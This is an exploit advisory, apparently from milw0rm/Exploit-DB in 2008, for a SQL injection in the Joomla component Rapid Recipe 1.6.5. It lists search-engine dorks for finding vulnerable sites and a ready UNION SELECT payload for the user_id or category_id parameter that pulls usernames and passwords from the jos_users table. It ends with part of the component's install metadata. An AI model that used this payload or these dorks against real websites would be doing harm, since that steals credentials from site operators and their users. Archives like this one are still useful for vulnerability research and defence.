Joomla! Component Rapid Recipe 1.6.5 - SQL Injection

EDB-ID:

5103


Author:

S@BUN

Type:

webapps


Platform:

PHP

Date:

2008-02-12


#########################################################################
#
# joomla SQL Injection(com_rapidrecipe)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
#########################################################################
#
# DORK 1 : allinurl: "com_rapidrecipe"user_id
#
# DORK 2 : allinurl: "com_rapidrecipe" category_id
#
#########################################################################
EXPLOIT :

after user_id or catogry_id add exploit

-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

#########################################################################
# S@BUN           i AM NOT HACKER              S@BUN
#########################################################################

<mosinstall type="component">
 <name>rapidrecipe</name>
 <creationDate>30/7/2007</creationDate>
 <author>Konstantinos Kokkorogiannis</author>
 <copyright>This component in released under the Chefs and Koyans License. You should not use it unless you have bought it.</copyright>
 <authorEmail>koyan@dianthos.net</authorEmail>

 <authorUrl>www.dianthos.net</authorUrl>
 <version>1.6.5</version>

# milw0rm.com [2008-02-12]